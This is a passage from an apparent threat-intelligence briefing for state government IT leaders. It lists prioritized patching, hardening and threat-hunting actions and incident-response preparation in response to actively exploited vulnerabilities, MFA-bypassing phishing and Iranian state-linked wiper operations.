<table> <tbody> <tr> <td> <p><strong>#</strong></p> </td> <td> <p><strong>Action</strong></p> </td> <td> <p><strong>Owner</strong></p> </td> <td> <p><strong>Why Now</strong></p> </td> </tr> <tr> <td> <p>1</p> </td> <td> <p><strong>Push Chrome 146.0.7680.75/76 to all managed endpoints</strong></p> </td> <td> <p>Endpoint Engineering</p> </td> <td> <p>Two zero-days under active exploitation; every Chrome browser is exposed</p> </td> </tr> <tr> <td> <p>2</p> </td> <td> <p><strong>Audit Cisco SD-WAN Manager version; emergency patch to 20.18+ if below</strong></p> </td> <td> <p>Network Engineering</p> </td> <td> <p>CISA Emergency Directive ED 26-03; CVE-2026-20122 and CVE-2026-20128 under active exploitation</p> </td> </tr> <tr> <td> <p>3</p> </td> <td> <p><strong>Block OAuth device code flow in Azure AD/Entra ID conditional access</strong></p> </td> <td> <p>IAM / Cloud Security</p> </td> <td> <p>Starkiller PhaaS actively abusing this flow to bypass MFA on Microsoft 365</p> </td> </tr> <tr> <td> <p>4</p> </td> <td> <p><strong>Verify VMware Aria Operations patching</strong> (if deployed)</p> </td> <td> <p>Infrastructure</p> </td> <td> <p>CVE-2026-22719 (CVSS 8.1, command injection) added to CISA KEV</p> </td> </tr> </tbody>
</table>
<h3>🟠 7-Day Actions</h3>
<table> <tbody> <tr> <td> <p><strong>#</strong></p> </td> <td> <p><strong>Action</strong></p> </td> <td> <p><strong>Owner</strong></p> </td> <td> <p><strong>Why This Week</strong></p> </td> </tr> <tr> <td> <p>5</p> </td> <td> <p><strong>Hunt for MuddyWater/Dindoor indicators</strong> across SIEM and EDR</p> </td> <td> <p>SOC / Threat Hunt</p> </td> <td> <p>Confirmed breaches of U.S. airport, bank, and software company; state agencies are in the target aperture</p> </td> </tr> <tr> <td> <p>6</p> </td> <td> <p><strong>Harden Intune MDM against unauthorized deployments</strong></p> </td> <td> <p>Endpoint Engineering</p> </td> <td> <p>Handala's documented technique of weaponizing Intune for wiper deployment</p> </td> </tr> <tr> <td> <p>7</p> </td> <td> <p><strong>Inventory and patch ICS/BMS systems</strong> (Honeywell IQ4x, Trane Tracer, Siemens SIMATIC, Ignition SCADA)</p> </td> <td> <p>Facilities / OT Security</p> </td> <td> <p>Five CISA ICS advisories in one week affecting common state government systems</p> </td> </tr> <tr> <td> <p>8</p> </td> <td> <p><strong>Review and restrict Intune application deployment permissions</strong></p> </td> <td> <p>IAM / Endpoint</p> </td> <td> <p>Limit deployment rights to named administrators; enable deployment approval workflows</p> </td> </tr> <tr> <td> <p>9</p> </td> <td> <p><strong>Audit Azure AD sign-in logs for AitM indicators</strong></p> </td> <td> <p>SOC</p> </td> <td> <p>Session cookie replay, impossible travel, unexpected device code authentications</p> </td> </tr> </tbody>
</table>
<h3>🟡 30-Day Actions</h3>
<table> <tbody> <tr> <td> <p><strong>#</strong></p> </td> <td> <p><strong>Action</strong></p> </td> <td> <p><strong>Owner</strong></p> </td> <td> <p><strong>Why This Month</strong></p> </td> </tr> <tr> <td> <p>10</p> </td> <td> <p><strong>Conduct Iranian wiper/espionage tabletop exercise</strong></p> </td> <td> <p>CISO Office / IR Team</p> </td> <td> <p>Three Iranian actor groups conducting confirmed operations against U.S. targets; state government is in the target set</p> </td> </tr> <tr> <td> <p>11</p> </td> <td> <p><strong>Evaluate FIDO2/passkey deployment for high-privilege accounts</strong></p> </td> <td> <p>IAM</p> </td> <td> <p>Phishing-resistant MFA is the only strategic countermeasure to AitM phishing (Starkiller and successors)</p> </td> </tr> <tr> <td> <p>12</p> </td> <td> <p><strong>Assess OT threat intelligence coverage</strong></p> </td> <td> <p>CTI / CISO Office</p> </td> <td> <p>Five ICS advisories with minimal supplementary intelligence; dedicated OT intel feed needed</p> </td> </tr> <tr> <td> <p>13</p> </td> <td> <p><strong>Review MSP and third-party vendor security posture</strong></p> </td> <td> <p>Vendor Management</p> </td> <td> <p>ConnectWise 2026 MSP Threat Report warns identity abuse is redefining MSP risk; Black Kite reports 136 verified supply chain breaches in 2025 with 5x downstream impact</p> </td> </tr> <tr> <td> <p>14</p> </td> <td> <p><strong>Brief state agency heads on Iranian cyber threat</strong></p> </td> <td> <p>CIO / CISO</p> </td> <td> <p>Executive awareness is essential for rapid decision-making if a destructive attack occurs</p> </td> </tr> </tbody>
</table>
<h3>Executive / IR Preparedness</h3>
<ul> <li><strong>Decision pre-authorization:</strong> Obtain advance approval from agency leadership for emergency patching windows and network segment isolation — so that when (not if) an incident occurs, the SOC can act without waiting for authorization.</li> <li><strong>IR retainer validation:</strong> Confirm your incident response retainer is active and that your IR provider has current network diagrams, contact trees, and escalation procedures.</li> <li><strong>Communication plan:</strong> Prepare draft public communications for a destructive cyber incident affecting citizen services. The Stryker attack took thousands of employees offline — a similar attack on state systems would immediately affect millions of residents.</li> <li><strong>Federal coordination:</strong> Despite ongoing CISA budget constraints and leadership transitions, maintain active communication with your CISA regional office and FBI field office. The FBI's March 3 reminder to critical infrastructure organizations is an invitation to engage.</li>
</ul>
<h2>The Bottom Line</h2>
<p>The convergence of Iranian retaliatory operations, actively exploited network infrastructure vulnerabilities, browser zero-days, and MFA-defeating phishing platforms creates a threat environment that demands immediate, coordinated action from state government IT leadership.</p>
<p>This is not a drill. Iranian state actors have already breached a U.S. airport, a bank, and a software company. A pro-Iranian group has already wiped 200,000 devices at a major U.S. corporation using MDM — the same technology your agencies use to manage endpoints. CISA has issued an emergency directive for network infrastructure that many state agencies rely on.</p>
<p><strong>The three decisions that matter most right now:</strong></p>
<ol> <li><strong>Authorize emergency patching</strong> for Chrome and Cisco SD-WAN — today, not next maintenance window.</li> <li><strong>Block OAuth device code flow</strong> in your Microsoft 365 environment — before Starkiller campaigns reach your users.</li> <li><strong>Start planning for a destructive attack</strong> — tabletop an Iranian wiper scenario within 30 days, because the actors, tools, and motivation are all in place.</li>
</ol>
<p>The threat actors are not waiting. Neither should you.</p>